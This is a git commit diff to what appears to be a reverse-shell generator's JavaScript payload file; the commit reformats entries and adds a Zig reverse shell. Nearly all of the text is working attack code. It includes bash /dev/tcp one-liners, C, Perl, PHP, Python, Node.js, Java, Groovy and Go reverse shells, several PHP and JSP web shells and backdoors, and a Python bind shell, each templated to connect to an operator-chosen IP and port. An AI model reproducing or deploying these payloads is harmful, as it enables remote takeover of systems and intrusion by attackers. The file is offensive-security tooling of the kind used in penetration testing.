cleanup/format + add zig

ArchiMoebius 2025-02-17 10:58:32 -05:00
parent cf609e544b
commit c59c14b9a7


@ -1,4 +1,3 @@
const CommandType = {
'ReverseShell': 'ReverseShell',
'BindShell': 'BindShell',
@ -20,8 +19,7 @@ const withCommandType = function (commandType, elements) {
const reverseShellCommands = withCommandType(
CommandType.ReverseShell,
[
{
[{
"name": "Bash -i",
"command": "{shell} -i >& /dev/tcp/{ip}/{port} 0>&1",
"meta": ["linux", "mac"]
@ -101,7 +99,7 @@ const reverseShellCommands = withCommandType(
"command": "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n\nint main(void){\n int port = {port};\n struct sockaddr_in revsockaddr;\n\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\n revsockaddr.sin_family = AF_INET; \n revsockaddr.sin_port = htons(port);\n revsockaddr.sin_addr.s_addr = inet_addr(\"{ip}\");\n\n connect(sockt, (struct sockaddr *) &revsockaddr, \n sizeof(revsockaddr));\n dup2(sockt, 0);\n dup2(sockt, 1);\n dup2(sockt, 2);\n\n char * const argv[] = {\"{shell}\", NULL};\n execvp(\"{shell}\", argv);\n\n return 0; \n}",
"meta": ["linux", "mac"]
},
{
{
"name": "C Windows",
"command": "#include <winsock2.h>\r\n#include <stdio.h>\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\nWSADATA wsaData;\r\nSOCKET Winsock;\r\nstruct sockaddr_in hax; \r\nchar ip_addr[16] = \"{ip}\"; \r\nchar port[6] = \"{port}\"; \r\n\r\nSTARTUPINFO ini_processo;\r\n\r\nPROCESS_INFORMATION processo_info;\r\n\r\nint main()\r\n{\r\n WSAStartup(MAKEWORD(2, 2), &wsaData);\r\n Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0;\r\n\r\n\r\n struct hostent *host; \r\n host = gethostbyname(ip_addr);\r\n strcpy_s(ip_addr, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));\r\n\r\n hax.sin_family = AF_INET;\r\n hax.sin_port = htons(atoi(port));\r\n hax.sin_addr.s_addr = inet_addr(ip_addr);\r\n\r\n WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);\r\n\r\n memset(&ini_processo, 0, sizeof(ini_processo));\r\n ini_processo.cb = sizeof(ini_processo);\r\n ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; \r\n ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;\r\n\r\n TCHAR cmd[255] = TEXT(\"cmd.exe\");\r\n\r\n CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);\r\n\r\n return 0;\r\n}",
"meta": ["windows"]
@ -136,16 +134,16 @@ const reverseShellCommands = withCommandType(
"command": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{ip}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
"meta": ["linux", "mac"]
},
{
{
"name": "Perl PentestMonkey",
"command": `#!/usr/bin/perl -w\n# perl-reverse-shell - A Reverse Shell implementation in PERL\n# Copyright (C) 2006 pentestmonkey@pentestmonkey.net\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. The author accepts no liability\n# for damage caused by this tool. If these terms are not acceptable to you, then\n# do not use this tool.\n#\n# In all other respects the GPL version 2 applies:\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. If these terms are not acceptable to\n# you, then do not use this tool.\n#\n# You are encouraged to send comments, improvements or suggestions to\n# me at pentestmonkey@pentestmonkey.net\n#\n# Description\n# -----------\n# This script will make an outbound TCP connection to a hardcoded IP and port.\n# The recipient will be given a shell running as the current user (apache normally).\n#\n\nuse strict;\nuse Socket;\nuse FileHandle;\nuse POSIX;\nmy $VERSION = "1.0";\n\n# Where to send the reverse shell. 
Change these.\nmy $ip = '{ip}';\nmy $port = {port};\n\n# Options\nmy $daemon = 1;\nmy $auth = 0; # 0 means authentication is disabled and any \n # source IP can access the reverse shell\nmy $authorised_client_pattern = qr(^127\\.0\\.0\\.1$);\n\n# Declarations\nmy $global_page = "";\nmy $fake_process_name = "/usr/sbin/apache";\n\n# Change the process name to be less conspicious\n$0 = "[httpd]";\n\n# Authenticate based on source IP address if required\nif (defined($ENV{'REMOTE_ADDR'})) {\n cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");\n\n if ($auth) {\n unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {\n cgiprint("ERROR: Your client isn't authorised to view this page");\n cgiexit();\n }\n }\n} elsif ($auth) {\n cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");\n cgiexit(0);\n}\n\n# Background and dissociate from parent process if required\nif ($daemon) {\n my $pid = fork();\n if ($pid) {\n cgiexit(0); # parent exits\n }\n\n setsid();\n chdir('/');\n umask(0);\n}\n\n# Make TCP connection for reverse shell\nsocket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));\nif (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {\n cgiprint("Sent reverse shell to $ip:$port");\n cgiprintpage();\n} else {\n cgiprint("Couldn't open reverse shell to $ip:$port: $!");\n cgiexit(); \n}\n\n# Redirect STDIN, STDOUT and STDERR to the TCP connection\nopen(STDIN, ">&SOCK");\nopen(STDOUT,">&SOCK");\nopen(STDERR,">&SOCK");\n$ENV{'HISTFILE'} = '/dev/null';\nsystem("w;uname -a;id;pwd");\nexec({"{shell}"} ($fake_process_name, "-i"));\n\n# Wrapper around print\nsub cgiprint {\n my $line = shift;\n $line .= "<p>\\n";\n $global_page .= $line;\n}\n\n# Wrapper around exit\nsub cgiexit {\n cgiprintpage();\n exit 0; # 0 to ensure we don't give a 500 response.\n}\n\n# Form HTTP response using all the messages gathered by cgiprint so far\nsub cgiprintpage {\n print "Content-Length: " . length($global_page) . 
"\\r\nConnection: close\\r\nContent-Type: text\\/html\\r\\n\\r\\n" . $global_page;\n}\n`,
"meta": ["linux", "mac"]
},
// {
// "name": "PHP Emoji",
// "command": "php -r '$😀=\"1\";$😁=\"2\";$😅=\"3\";$😆=\"4\";$😉=\"5\";$😊=\"6\";$😎=\"7\";$😍=\"8\";$😚=\"9\";$🙂=\"0\";$🤢=\" \";$🤓=\"<\";$🤠=\">\";$😱=\"-\";$😵=\"&\";$🤩=\"i\";$🤔=\".\";$🤨=\"/\";$🥰=\"a\";$😐=\"b\";$😶=\"i\";$🙄=\"h\";$😂=\"c\";$🤣=\"d\";$😃=\"e\";$😄=\"f\";$😋=\"k\";$😘=\"n\";$😗=\"o\";$😙=\"p\";$🤗=\"s\";$😑=\"x\";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = \"{ip}\";$💻 = {port};$🐚 = \"{shell}\". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $😁. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($🐚);'",
// "meta": ["linux", "mac"]
// },
// {
// "name": "PHP Emoji",
// "command": "php -r '$😀=\"1\";$😁=\"2\";$😅=\"3\";$😆=\"4\";$😉=\"5\";$😊=\"6\";$😎=\"7\";$😍=\"8\";$😚=\"9\";$🙂=\"0\";$🤢=\" \";$🤓=\"<\";$🤠=\">\";$😱=\"-\";$😵=\"&\";$🤩=\"i\";$🤔=\".\";$🤨=\"/\";$🥰=\"a\";$😐=\"b\";$😶=\"i\";$🙄=\"h\";$😂=\"c\";$🤣=\"d\";$😃=\"e\";$😄=\"f\";$😋=\"k\";$😘=\"n\";$😗=\"o\";$😙=\"p\";$🤗=\"s\";$😑=\"x\";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = \"{ip}\";$💻 = {port};$🐚 = \"{shell}\". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $😁. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($🐚);'",
// "meta": ["linux", "mac"]
// },
{
"name": "PHP PentestMonkey",
"command": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '{ip}';\n$port = {port};\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; {shell} -i';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists('pcntl_fork')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit(\"ERROR: Can't fork\");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0); // Parent exits\n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit(\"Error: Can't setsid()\");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");\n}\n\nchdir(\"/\");\n\numask(0);\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit(\"$errstr ($errno)\");\n\texit(1);\n}\n\n$descriptorspec = array(\n 0 => array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, 
$error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?>",
@ -161,12 +159,12 @@ const reverseShellCommands = withCommandType(
"command": "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER[\'PHP_SELF\']); ?>\">\n<input type=\"TEXT\" name=\"cmd\" id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n<\/form>\n<pre>\n<?php\n if(isset($_GET[\'cmd\']))\n {\n system($_GET[\'cmd\']);\n }\n?>\n<\/pre>\n<\/body>\n<script>document.getElementById(\"cmd\").focus();<\/script>\n<\/html>",
"meta": ["linux", "windows", "mac"]
},
{
{
"name": "PHP cmd 2",
"command": "<?php if(isset($_REQUEST[\"cmd\"])){ echo \"<pre>\"; $cmd = ($_REQUEST[\"cmd\"]); system($cmd); echo \"<\/pre>\"; die; }?>",
"meta": ["linux", "windows", "mac"]
},
{
{
"name": "PHP cmd small",
"command": "<?=`$_GET[0]`?>",
"meta": ["linux", "windows", "mac"]
@ -257,8 +255,8 @@ const reverseShellCommands = withCommandType(
},
{
"name": "Python3 Windows",
"command": "import os,socket,subprocess,threading;\ndef s2p(s, p):\n while True:\n data = s.recv(1024)\n if len(data) > 0:\n p.stdin.write(data)\n p.stdin.flush()\n\ndef p2s(s, p):\n while True:\n s.send(p.stdout.read(1))\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((\"{ip}\",{port}))\n\np=subprocess.Popen([\"{shell}\"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)\n\ns2p_thread = threading.Thread(target=s2p, args=[s, p])\ns2p_thread.daemon = True\ns2p_thread.start()\n\np2s_thread = threading.Thread(target=p2s, args=[s, p])\np2s_thread.daemon = True\np2s_thread.start()\n\ntry:\n p.wait()\nexcept KeyboardInterrupt:\n s.close()",
"meta": ["windows"]
"command": "import os,socket,subprocess,threading;\ndef s2p(s, p):\n while True:\n data = s.recv(1024)\n if len(data) > 0:\n p.stdin.write(data)\n p.stdin.flush()\n\ndef p2s(s, p):\n while True:\n s.send(p.stdout.read(1))\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((\"{ip}\",{port}))\n\np=subprocess.Popen([\"{shell}\"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)\n\ns2p_thread = threading.Thread(target=s2p, args=[s, p])\ns2p_thread.daemon = True\ns2p_thread.start()\n\np2s_thread = threading.Thread(target=p2s, args=[s, p])\np2s_thread.daemon = True\np2s_thread.start()\n\ntry:\n p.wait()\nexcept KeyboardInterrupt:\n s.close()",
"meta": ["windows"]
},
{
"name": "Python3 shortest",
@ -295,12 +293,12 @@ const reverseShellCommands = withCommandType(
"command": "require('child_process').exec('nc -e {shell} {ip} {port}')",
"meta": ["linux", "mac"]
},
{
{
"name": "node.js #2",
"command": "(function(){\r\n var net = require(\"net\"),\r\n cp = require(\"child_process\"),\r\n sh = cp.spawn(\"\{shell}\", []);\r\n var client = new net.Socket();\r\n client.connect({port}, \"{ip}\", function(){\r\n client.pipe(sh.stdin);\r\n sh.stdout.pipe(client);\r\n sh.stderr.pipe(client);\r\n });\r\n return \/a\/; \/\/ Prevents the Node.js application from crashing\r\n})();",
"meta": ["linux", "mac", "windows"]
},
{
{
"name": "Java #1",
"command": "public class shell {\n public static void main(String[] args) {\n Process p;\n try {\n p = Runtime.getRuntime().exec(\"bash -c $@|bash 0 echo bash -i >& /dev/tcp/{ip}/{port} 0>&1\");\n p.waitFor();\n p.destroy();\n } catch (Exception e) {}\n }\n}",
"meta": ["linux", "mac"]
@ -315,27 +313,27 @@ const reverseShellCommands = withCommandType(
"command": "import java.io.InputStream;\nimport java.io.OutputStream;\nimport java.net.Socket;\n\npublic class shell {\n public static void main(String[] args) {\n String host = \"{ip}\";\n int port = {port};\n String cmd = \"{shell}\";\n try {\n Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n Socket s = new Socket(host, port);\n InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n while (!s.isClosed()) {\n while (pi.available() > 0)\n so.write(pi.read());\n while (pe.available() > 0)\n so.write(pe.read());\n while (si.available() > 0)\n po.write(si.read());\n so.flush();\n po.flush();\n Thread.sleep(50);\n try {\n p.exitValue();\n break;\n } catch (Exception e) {}\n }\n p.destroy();\n s.close();\n } catch (Exception e) {}\n }\n}",
"meta": ["windows", "linux", "mac"]
},
{
{
"name": "Java Web",
"command": "<%@\r\npage import=\"java.lang.*, java.util.*, java.io.*, java.net.*\"\r\n% >\r\n<%!\r\nstatic class StreamConnector extends Thread\r\n{\r\n InputStream is;\r\n OutputStream os;\r\n StreamConnector(InputStream is, OutputStream os)\r\n {\r\n this.is = is;\r\n this.os = os;\r\n }\r\n public void run()\r\n {\r\n BufferedReader isr = null;\r\n BufferedWriter osw = null;\r\n try\r\n {\r\n isr = new BufferedReader(new InputStreamReader(is));\r\n osw = new BufferedWriter(new OutputStreamWriter(os));\r\n char buffer[] = new char[8192];\r\n int lenRead;\r\n while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)\r\n {\r\n osw.write(buffer, 0, lenRead);\r\n osw.flush();\r\n }\r\n }\r\n catch (Exception ioe)\r\n try\r\n {\r\n if(isr != null) isr.close();\r\n if(osw != null) osw.close();\r\n }\r\n catch (Exception ioe)\r\n }\r\n}\r\n%>\r\n\r\n<h1>JSP Backdoor Reverse Shell<\/h1>\r\n\r\n<form method=\"post\">\r\nIP Address\r\n<input type=\"text\" name=\"ipaddress\" size=30>\r\nPort\r\n<input type=\"text\" name=\"port\" size=10>\r\n<input type=\"submit\" name=\"Connect\" value=\"Connect\">\r\n<\/form>\r\n<p>\r\n<hr>\r\n\r\n<%\r\nString ipAddress = request.getParameter(\"ipaddress\");\r\nString ipPort = request.getParameter(\"port\");\r\nif(ipAddress != null && ipPort != null)\r\n{\r\n Socket sock = null;\r\n try\r\n {\r\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\r\n Runtime rt = Runtime.getRuntime();\r\n Process proc = rt.exec(\"cmd.exe\");\r\n StreamConnector outputConnector =\r\n new StreamConnector(proc.getInputStream(),\r\n sock.getOutputStream());\r\n StreamConnector inputConnector =\r\n new StreamConnector(sock.getInputStream(),\r\n proc.getOutputStream());\r\n outputConnector.start();\r\n inputConnector.start();\r\n }\r\n catch(Exception e) \r\n}\r\n%>",
"meta": ["windows", "linux", "mac"]
},
{
{
"name": "Java Two Way",
"command": "<%\r\n \/*\r\n * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (atacker machine), with the IP and Port specified at the end of the file.\r\n * If it cannot connect, an HTML will prompt and you can input commands (sh\/cmd) there and it will prompts the output in the HTML.\r\n * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button \"send\" is clicked, it will try to connect to the reverse shell again (apart from executing \r\n * the command specified in the HTML form). This is to avoid to keep it simple.\r\n *\/\r\n%>\r\n\r\n<%@page import=\"java.lang.*\"%>\r\n<%@page import=\"java.io.*\"%>\r\n<%@page import=\"java.net.*\"%>\r\n<%@page import=\"java.util.*\"%>\r\n\r\n<html>\r\n<head>\r\n <title>jrshell<\/title>\r\n<\/head>\r\n<body>\r\n<form METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">\r\n <input TYPE=\"text\" NAME=\"shell\">\r\n <input TYPE=\"submit\" VALUE=\"Send\">\r\n<\/form>\r\n<pre>\r\n<%\r\n \/\/ Define the OS\r\n String shellPath = null;\r\n try\r\n {\r\n if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1) {\r\n shellPath = new String(\"\/bin\/sh\");\r\n } else {\r\n shellPath = new String(\"cmd.exe\");\r\n }\r\n } catch( Exception e ){}\r\n \/\/ INNER HTML PART\r\n if (request.getParameter(\"shell\") != null) {\r\n out.println(\"Command: \" + request.getParameter(\"shell\") + \"\\n<BR>\");\r\n Process p;\r\n if (shellPath.equals(\"cmd.exe\"))\r\n p = Runtime.getRuntime().exec(\"cmd.exe \/c \" + request.getParameter(\"shell\"));\r\n else\r\n p = Runtime.getRuntime().exec(\"\/bin\/sh -c \" + request.getParameter(\"shell\"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n }\r\n }\r\n \/\/ TCP PORT 
PART\r\n class StreamConnector extends Thread\r\n {\r\n InputStream wz;\r\n OutputStream yr;\r\n StreamConnector( InputStream wz, OutputStream yr ) {\r\n this.wz = wz;\r\n this.yr = yr;\r\n }\r\n public void run()\r\n {\r\n BufferedReader r = null;\r\n BufferedWriter w = null;\r\n try\r\n {\r\n r = new BufferedReader(new InputStreamReader(wz));\r\n w = new BufferedWriter(new OutputStreamWriter(yr));\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n w.write( buffer, 0, length );\r\n w.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n if( r != null )\r\n r.close();\r\n if( w != null )\r\n w.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n \r\n try {\r\n Socket socket = new Socket( \"{ip}\", {port} ); \/\/ Replace with wanted ip and port\r\n Process process = Runtime.getRuntime().exec( shellPath );\r\n new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();\r\n new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();\r\n out.println(\"port opened on \" + socket);\r\n } catch( Exception e ) {}\r\n%>\r\n<\/pre>\r\n<\/body>\r\n<\/html>",
"meta": ["windows", "linux", "mac"]
},
{
"name": "Javascript",
"command":"String command = \"var host = \'{ip}\';\" +\r\n \"var port = {port};\" +\r\n \"var cmd = \'{shell}\';\"+\r\n \"var s = new java.net.Socket(host, port);\" +\r\n \"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();\"+\r\n \"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\"+\r\n \"var po = p.getOutputStream(), so = s.getOutputStream();\"+\r\n \"print (\'Connected\');\"+\r\n \"while (!s.isClosed()) {\"+\r\n \" while (pi.available() > 0)\"+\r\n \" so.write(pi.read());\"+\r\n \" while (pe.available() > 0)\"+\r\n \" so.write(pe.read());\"+\r\n \" while (si.available() > 0)\"+\r\n \" po.write(si.read());\"+\r\n \" so.flush();\"+\r\n \" po.flush();\"+\r\n \" java.lang.Thread.sleep(50);\"+\r\n \" try {\"+\r\n \" p.exitValue();\"+\r\n \" break;\"+\r\n \" }\"+\r\n \" catch (e) {\"+\r\n \" }\"+\r\n \"}\"+\r\n \"p.destroy();\"+\r\n \"s.close();\";\r\nString x = \"\\\"\\\".getClass().forName(\\\"javax.script.ScriptEngineManager\\\").newInstance().getEngineByName(\\\"JavaScript\\\").eval(\\\"\"+command+\"\\\")\";\r\nref.add(new StringRefAddr(\"x\", x);",
"meta":["linux", "mac", "windows"]
},
{
"name": "Groovy",
"command":"String host=\"{ip}\";int port={port};String cmd=\"{shell}\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();",
"meta":["windows"]
},
{
{
"name": "Javascript",
"command": "String command = \"var host = \'{ip}\';\" +\r\n \"var port = {port};\" +\r\n \"var cmd = \'{shell}\';\"+\r\n \"var s = new java.net.Socket(host, port);\" +\r\n \"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();\"+\r\n \"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\"+\r\n \"var po = p.getOutputStream(), so = s.getOutputStream();\"+\r\n \"print (\'Connected\');\"+\r\n \"while (!s.isClosed()) {\"+\r\n \" while (pi.available() > 0)\"+\r\n \" so.write(pi.read());\"+\r\n \" while (pe.available() > 0)\"+\r\n \" so.write(pe.read());\"+\r\n \" while (si.available() > 0)\"+\r\n \" po.write(si.read());\"+\r\n \" so.flush();\"+\r\n \" po.flush();\"+\r\n \" java.lang.Thread.sleep(50);\"+\r\n \" try {\"+\r\n \" p.exitValue();\"+\r\n \" break;\"+\r\n \" }\"+\r\n \" catch (e) {\"+\r\n \" }\"+\r\n \"}\"+\r\n \"p.destroy();\"+\r\n \"s.close();\";\r\nString x = \"\\\"\\\".getClass().forName(\\\"javax.script.ScriptEngineManager\\\").newInstance().getEngineByName(\\\"JavaScript\\\").eval(\\\"\"+command+\"\\\")\";\r\nref.add(new StringRefAddr(\"x\", x);",
"meta": ["linux", "mac", "windows"]
},
{
"name": "Groovy",
"command": "String host=\"{ip}\";int port={port};String cmd=\"{shell}\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();",
"meta": ["windows"]
},
{
"name": "telnet",
"command": "TF=$(mktemp -u);mkfifo $TF && telnet {ip} {port} 0<$TF | {shell} 1>$TF",
"meta": ["linux", "mac"]
@ -360,7 +358,7 @@ const reverseShellCommands = withCommandType(
"command": "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"{ip}:{port}\");cmd:=exec.Command(\"{shell}\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go",
"meta": ["linux", "mac", "windows"]
},
{
{
"name": "Vlang",
"command": "echo 'import os' > /tmp/t.v && echo 'fn main() { os.system(\"nc -e {shell} {ip} {port} 0>&1\") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v",
"meta": ["linux", "mac"]
@ -384,16 +382,20 @@ const reverseShellCommands = withCommandType(
"name": "Crystal (code)",
"command": "require \"process\"\nrequire \"socket\"\n\nc = Socket.tcp(Socket::Family::INET)\nc.connect(\"{ip}\", {port})\nloop do \n m, l = c.receive\n p = Process.new(m.rstrip(\"\\n\"), output:Process::Redirect::Pipe, shell:true)\n c << p.output.gets_to_end\nend",
"meta": ["linux", "mac"]
},
{
"name": "Zig",
"command": "// See: `zig targets` for a valid list\n//\n// For an 'executable':\n// Windows: zig build-exe -target x86_64-windows-gnu reverse-shell.zig\n// Linux : zig build-exe reverse-shell.zig\n//\n// For a 'library':\n// Windows: zig build-lib -dynamic -target x86_64-windows-gnu reverse-shell.zig\n// Linux: zig build-lib -dynamic reverse-shell.zig\n\nconst std = @import(\"std\");\n\npub fn main() !void {\n var arena = std.heap.ArenaAllocator.init(std.heap.page_allocator);\n defer arena.deinit();\n const allocator = arena.allocator();\n\n while (true) {\n std.time.sleep(5 * std.time.ns_per_s);\n\n const peer = try std.net.Address.parseIp4(\"{ip}\", {port});\n\n const stream = std.net.tcpConnectToAddress(peer) catch {\n continue;\n };\n\n defer stream.close();\n\n var reader = stream.reader();\n const writer = stream.writer();\n\n var buffer: [1024]u8 = undefined;\n\n const FifoBuffer = std.fifo.LinearFifo(u8, .{ .Static = 1024 });\n var fifo = FifoBuffer.init();\n\n while (true) {\n buffer = std.mem.zeroes([1024]u8);\n\n var line = (try reader.readUntilDelimiterOrEof(\n &buffer,\n '\\n',\n )) orelse continue;\n\n if (@import(\"builtin\").os.tag == .windows) {\n line = @constCast(std.mem.trimRight(u8, line, \"\\r\"));\n }\n\n var process: std.process.Child = std.process.Child.init(&[_][]const u8{ \"/bin/bash\", \"-c\", line }, allocator);\n if (@import(\"builtin\").os.tag == .windows) {\n process = std.process.Child.init(&[_][]const u8{ \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"/c\", line }, allocator);\n }\n\n process.stderr_behavior = .Pipe;\n process.stdout_behavior = .Pipe;\n\n process.spawn() catch {\n break;\n };\n\n if (process.stderr != null) {\n fifo.pump(process.stderr.?.reader(), writer) catch {\n break;\n };\n }\n\n if (process.stdout != null) {\n fifo.pump(process.stdout.?.reader(), writer) catch {\n break;\n };\n }\n\n _ = process.wait() catch {\n break;\n };\n }\n }\n}\n\n",
"meta": ["linux", "windows", "mac"]
}
]
);
// https://twitter.com/MuirlandOracle -- #Muiri Was Here :D
const bindShellCommands = withCommandType(
const bindShellCommands = withCommandType(
CommandType.BindShell,
[
{
[{
"name": "Python3 Bind",
"command": "python3 -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",{port}));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'",
"meta": ["bind", "mac", "linux", "windows"]
@ -416,10 +418,9 @@ const bindShellCommands = withCommandType(
]
);
const msfvenomCommands = withCommandType(
const msfvenomCommands = withCommandType(
CommandType.MSFVenom,
[
{
